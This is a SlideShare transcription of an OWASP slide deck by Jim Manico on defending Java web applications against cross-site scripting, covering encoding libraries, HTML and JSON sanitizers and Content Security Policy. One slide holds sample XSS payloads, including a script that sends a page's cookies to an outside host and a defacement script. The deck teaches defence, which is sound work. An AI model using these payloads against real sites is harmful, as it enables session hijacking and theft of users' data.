SlideShare una empresa de Scribd logo

Cross Site Scripting (XSS) Defense with Java

Descargar como PPTX, PDF
Jim Manico
Jim Manico

Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.

TecnologíaDiseño
1 de 37
The OWASP Foundation http://www.owasp.org Cross Site Scripting Contextual Output Encoding Secure JS/JSON Workflow
The OWASP Foundation http://www.owasp.org
The OWASP Foundation http://www.owasp.org
The OWASP Foundation http://www.owasp.org Encoding Output Safe ways to represent dangerous characters in a web page Characters Decimal Hexadecimal HTML Character Set Unicode " (double quotation marks) &#34; &#x22; &quot; u0022 ' (single quotation mark) &#39; &#x27; &apos; u0027 & (ampersand) &#38; &#x26; &amp; u0026 < (less than) &#60; &#x3C; &lt; u003c > (greater than) &#62; &#x3E; &gt; u003e
The OWASP Foundation http://www.owasp.org XSS Attack Payloads – Session Hijacking – Site Defacement – Network Scanning – Undermining CSRF Defenses – Site Redirection/Phishing – Load of Remotely Hosted Scripts – Data Theft – Keystroke Logging – Attackers using XSS more frequently
The OWASP Foundation http://www.owasp.org <script>var img = new Image();img.src='https://evileviljim.co m/owasp/data=' + document.cookie;</script> <script>document.body.innerHTML=' <marquee>thick as manure half as useful </marquee>'; </script> Sample XSS Attacks
The OWASP Foundation http://www.owasp.org XSS Defense by Data Type and Context Data Type Context Defense String HTML Body HTML Entity Encode String HTML Attribute Minimal Attribute Encoding String GET Parameter URL Encoding String Untrusted URL URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification String CSS Strict structural validation, CSS Hex encoding, good design HTML HTML Body HTML Validation (JSoup, AntiSamy, HTML Sanitizer) Any DOM DOM XSS Cheat Sheet Untrusted JavaScript Any Sandboxing JSON Client Parse Time JSON.parse() or json2.js Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
The OWASP Foundation http://www.owasp.org OWASP XSS Prevention Cheatsheet https://www.owasp.org/index.php/XS S_(Cross_Site_Scripting)_Prevention_ Cheat_Sheet 1+ Million Page Views
The OWASP Foundation http://www.owasp.org OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project Ruby on Rails http://api.rubyonrails.org/classes/ERB/Util.html Reform Project Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP https://www.owasp.org/index.php/Category:OWASP_Encoding_Project ESAPI PHP.NET, Python, Classic ASP, Cold Fusion https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API .NET AntiXSS Library http://wpl.codeplex.com/releases/view/80289 Encoding Libraries
The OWASP Foundation http://www.owasp.org OWASP Java Encoder Project https://www.owasp.org/index.php/OWASP_Java_Encoder_Project • No third party libraries or configuration necessary. • This code was designed for high-availability/high- performance encoding functionality. • Simple drop-in encoding functionality • Redesigned for performance • More complete API (uri and uri component encoding, etc) in some regards. • This is a Java 1.5 project. • Will be the default encoder in the next revision of ESAPI. • Last updated February 14, 2013 (version 1.1)
The OWASP Foundation http://www.owasp.org The Problem Web Page built in Java JSP is vulnerable to XSS The Solution <%-- Basic HTML Context --%> <body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body> <%-- HTML Attribute Context --%> <input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" /> <%-- Javascript Block context --%> <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg); </script> <%-- Javascript Variable context --%> <button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
The OWASP Foundation http://www.owasp.org <b><%= Encode.forHtml(UNTRUSTED)%></b> <p>Title:<%= Encode.forHtml(UNTRUSTED)%></p> <textarea name="text"> <%= Encode.forHtmlContent(UNTRUSTED) %> </textarea> Basic HTML Encoding Contexts
The OWASP Foundation http://www.owasp.org <input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" /> <input type="text" name="data" value=<%= Encode.forHtmlUnquotedAttribute(UNTRUSTED) %> /> Encoding HTML Attributes
The OWASP Foundation http://www.owasp.org <%-- Encode URL parameter values --%> <a href="/search?value= <%=Encode.forUriComponent(parameterValue)%>&order=1#top"> <%-- Encode REST URL parameters --%> <a href="http://www.codemagi.com/page/ <%=Encode.forUriComponent(restUrlParameter)%>"> Encoding fragments of URL's
The OWASP Foundation http://www.owasp.org URI uri = new URI(rawURI); // throws URISyntaxException if invalid URI // don't allow relative urls if (!uri.isAbsolute()) throw new ValidationException("not an absolute uri"); // don't allows javascript urls, etc... if (!"http".equals(uri.getScheme()) && !"https".equals(uri.getScheme())) throw new ValidationException("we only support http(s) urls"; // who legitimately uses user-infos in their urls?!? if (uri.getUserInfo() != null) throw new ValidationException("this can only be trouble"); // normalize to get rid of '.' and '..' path components uri = uri.normalize(); // get rid of '.' and '..' // check: uri.getHost() against whitelist/blacklist? // check: uri.getPort() for shenanigans? String validURL = uri.toASCIIString(); Validating URL's
The OWASP Foundation http://www.owasp.org <a href=" <%= Encode.forHTMLAttribute(untrustedURL) %> "> Encode.forHtmlContent(untrustedURL) </a> Properly encoding a URL (linkable)
The OWASP Foundation http://www.owasp.org <button onclick="alert('<%= Encode.forJavaScript(alertMsg) %>');"> click me</button> <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button> <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(alertMsg) %>"; alert(msg); </script> JavaScript Encoding Contexts
The OWASP Foundation http://www.owasp.org <div style="background: url('<%=Encode.forCssUrl(value)%>');"> <style type="text/css"> background-color:'<%=Encode.forCssString(value)%>'; </style> CSS Encoding Context
The OWASP Foundation http://www.owasp.org Nested Contexts Best to avoid: an element attribute calling a Javascript function etc - parsing chains <div onclick="showError('<%=request.getParameter("errorxyz") %>')" >An error occurred ....</div> Here we have a HTML attribute(onClick) and within a nested Javascript function call (showError). Parsing order: 1: HTML decode the contents of the onclick attribute. 2: When onClick is selected: Javascript Parsing of showError So we have 2 contexts here...HTML and Javascript (2 different browser parsers) Nested Encoding Contexts
The OWASP Foundation http://www.owasp.org We need to apply "layered" encoding in the RIGHT order: 1) JavaScript encode 2) HTML Attribute Encode so it "unwinds" properly and is not vulnerable. <div onclick="showError ('<%= Encoder.encodeForHtml( Encoder.encodeForJavaScript( request.getParameter("error")%>')))" > An error occurred ....</div>
The OWASP Foundation http://www.owasp.org
The OWASP Foundation http://www.owasp.org OWASP HTML Sanitizer Project https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project • HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS. • This code was written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review https://code.google.com/p/owasp-java-html- sanitizer/wiki/AttackReviewGroundRules. • Very easy to use. • It allows for simple programmatic POSITIVE policy configuration (see below). No XML config. • Actively maintained by Mike Samuel from Google's AppSec team! • This is code from the Caja project that was donated by Google. It is rather high performance and low memory utilization.
The OWASP Foundation http://www.owasp.org Solving Real World Problems with the OWASP HTML Sanitizer Project The Problem Web Page is vulnerable to XSS because of untrusted HTML The Solution PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML);
The OWASP Foundation http://www.owasp.org PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("p") .allowElements( new ElementPolicy() { public String apply(String elementName, List<String> attrs) { attrs.add("class"); attrs.add("header-" + elementName); return "div"; } }, "h1", "h2", "h3", "h4", "h5", "h6")) .build(); String safeHTML = policy.sanitize(untrustedHTML);
The OWASP Foundation http://www.owasp.org  SAFE use of JQuery  $(‘#element’).text(UNTRUSTED DATA); UNSAFE use of JQuery $(‘#element’).html(UNTRUSTED DATA);
The OWASP Foundation http://www.owasp.org  Contextual encoding is a crucial technique needed to stop all types of XSS  jqencoder is a jQuery plugin that allows developers to do contextual encoding in JavaScript to stop DOM-based XSS  http://plugins.jquery.com/plugin- tags/security  $('#element').encode('html', cdata); JQuery Encoding with JQencoder
The OWASP Foundation http://www.owasp.org Get rid of XSS, eh? A script-src directive that doesn‘t contain ‘unsafe-inline’ eliminates a huge class of cross site scripting I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT
The OWASP Foundation http://www.owasp.org Content Security Policy • Anti-XSS W3C standard • Content Security Policy latest release version • http://www.w3.org/TR/CSP/ • Must move all inline script and style into external scripts • Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use - Firefox/IE10PR: X-Content-Security-Policy - Chrome Experimental: X-WebKit-CSP - Content-Security-Policy-Report-Only • Define a policy for the site regarding loading of content
The OWASP Foundation http://www.owasp.org Real world CSP in action
The OWASP Foundation http://www.owasp.org
The OWASP Foundation http://www.owasp.org OWASP JSON Sanitizer Project https://www.owasp.org/index.php/OWASP_JSON_Sanitizer • Given JSON-like content, converts it to valid JSON. • This can be attached at either end of a data-pipeline to help satisfy Postel's principle: Be conservative in what you do, be liberal in what you accept from others. • Applied to JSON-like content from others, it will produce well-formed JSON that should satisfy any parser you use. • Applied to your output before you send, it will coerce minor mistakes in encoding and make it easier to embed your JSON in HTML and XML.
The OWASP Foundation http://www.owasp.org Solving Real World Problems with the OWASP JSON Sanitizer Project The Problem Web Page is vulnerable to XSS because of parsing of untrusted JSON incorrectly The Solution JSON Sanitizer can help with two use cases. 1) Sanitizing untrusted JSON on the server that is submitted from the browser in standard AJAX communication 2) Sanitizing potentially untrusted JSON server-side before sending it to the browser. The output is a valid Javascript expression, so can be parsed by Javascript's eval or by JSON.parse.
The OWASP Foundation http://www.owasp.org <script id="init_data" type="application/json"> <%= Encode.forHtml(data.toJSON()); %> </script> Embed JSON Safely in HTML
The OWASP Foundation http://www.owasp.org // external js file var dataElement = document.getElementById('init_data'); // unescape the content of the span var jsonText = dataElement.textContent || dataElement.innerText; var initData = JSON.parse(html_unescape(jsonText)); Embed JSON Safely in HTML
The OWASP Foundation http://www.owasp.org Limit placement of JSON data into JQuery .val and .text $("input:text").val(json.description); $("p").text(json.fullname);
The OWASP Foundation http://www.owasp.org Cross Site Scripting Contextual Output Encoding Secure JS/JSON Workflow
The OWASP Foundation http://www.owasp.org @manicode jim@owasp.org jim@manico.net slideshare.net/jimmanico owasp.org/ index.php/M embership

Recomendados

JavaScript + Jenkins = Winning!
JavaScript + Jenkins = Winning!JavaScript + Jenkins = Winning!
JavaScript + Jenkins = Winning!
Eric Wendelin
 
Threat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using SplunkThreat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using Splunk
jamesmbower
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
Mukesh k.r
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
Secure Code Warrior
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
HackIT Ukraine
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAP
Paul Ionescu
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 

Recomendados

JavaScript + Jenkins = Winning!
JavaScript + Jenkins = Winning!JavaScript + Jenkins = Winning!
JavaScript + Jenkins = Winning!
Eric Wendelin
 
Threat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using SplunkThreat Hunting Web Shells Using Splunk
Threat Hunting Web Shells Using Splunk
jamesmbower
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
Mukesh k.r
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
Secure Code Warrior
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
HackIT Ukraine
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
Learn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAPLearn to pen-test with OWASP ZAP
Learn to pen-test with OWASP ZAP
Paul Ionescu
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
Daisuke_Dan
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
Mohammed A. Imran
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
 
Secure Software Development with 3rd Party Dependencies
Secure Software Development with 3rd Party DependenciesSecure Software Development with 3rd Party Dependencies
Secure Software Development with 3rd Party Dependencies
thariyarox
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
Aaron Weaver
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101
Imperva
 
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Jeff Williams
 
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
gmaran23
 
IDOR Know-How.pdf
IDOR Know-How.pdfIDOR Know-How.pdf
IDOR Know-How.pdf
Bhashit Pandya
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
Spin Lai
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
Aditya Gupta
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
Nutan Kumar Panda
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
HackerOne
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Splunk
 
WTF is Digital Risk Protection
WTF is Digital Risk ProtectionWTF is Digital Risk Protection
WTF is Digital Risk Protection
Digital Shadows
 
Different Methodology To Recon Your Targets
Different Methodology To Recon Your TargetsDifferent Methodology To Recon Your Targets
Different Methodology To Recon Your Targets
EslamAkl
 
Web Application Defences
Web Application DefencesWeb Application Defences
Web Application Defences
Damilola Longe, CISSP, CCSP, MSc
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
Eoin Keary
 

Más contenido relacionado

La actualidad más candente

The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
Daisuke_Dan
 
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Jeff Williams
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
HackerOne
 

La actualidad más candente (20)

The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Secure Software Development with 3rd Party Dependencies
Secure Software Development with 3rd Party DependenciesSecure Software Development with 3rd Party Dependencies
Secure Software Development with 3rd Party Dependencies
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101
 
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
 
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
Automating Web Application Security Testing With OWASP ZAP DOT NET API - Tech...
 
IDOR Know-How.pdf
IDOR Know-How.pdfIDOR Know-How.pdf
IDOR Know-How.pdf
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
OWASP Top 10 - 2017
OWASP Top 10 - 2017OWASP Top 10 - 2017
OWASP Top 10 - 2017
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
 
WTF is Digital Risk Protection
WTF is Digital Risk ProtectionWTF is Digital Risk Protection
WTF is Digital Risk Protection
 
Different Methodology To Recon Your Targets
Different Methodology To Recon Your TargetsDifferent Methodology To Recon Your Targets
Different Methodology To Recon Your Targets
 

Similar a Cross Site Scripting (XSS) Defense with Java

Slides
SlidesSlides
Slides
vti
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
johnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
azida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
cgt38842
 
AtlasCamp 2014: Static Connect Add-ons
AtlasCamp 2014: Static Connect Add-onsAtlasCamp 2014: Static Connect Add-ons
AtlasCamp 2014: Static Connect Add-ons
Atlassian
 

Similar a Cross Site Scripting (XSS) Defense with Java (20)

Web Application Defences
Web Application DefencesWeb Application Defences
Web Application Defences
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Slides
SlidesSlides
Slides
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Avatar 2.0
Avatar 2.0Avatar 2.0
Avatar 2.0
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security Class
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
AtlasCamp 2014: Static Connect Add-ons
AtlasCamp 2014: Static Connect Add-onsAtlasCamp 2014: Static Connect Add-ons
AtlasCamp 2014: Static Connect Add-ons
 
자바 웹 개발 시작하기 (1주차 : 웹 어플리케이션 체험 실습)
자바 웹 개발 시작하기 (1주차 : 웹 어플리케이션 체험 실습)자바 웹 개발 시작하기 (1주차 : 웹 어플리케이션 체험 실습)
자바 웹 개발 시작하기 (1주차 : 웹 어플리케이션 체험 실습)
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments
 
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site ScriptingOWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
OWASP ESAPI and Microsoft Web Libraries in Cross-Site Scripting
 
Event-driven IO server-side JavaScript environment based on V8 Engine
Event-driven IO server-side JavaScript environment based on V8 EngineEvent-driven IO server-side JavaScript environment based on V8 Engine
Event-driven IO server-side JavaScript environment based on V8 Engine
 
Server Side JavaScript on the Java Platform - David Delabassee
Server Side JavaScript on the Java Platform - David DelabasseeServer Side JavaScript on the Java Platform - David Delabassee
Server Side JavaScript on the Java Platform - David Delabassee
 

Último

Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
Overkill Security
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 

Último (20)

Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
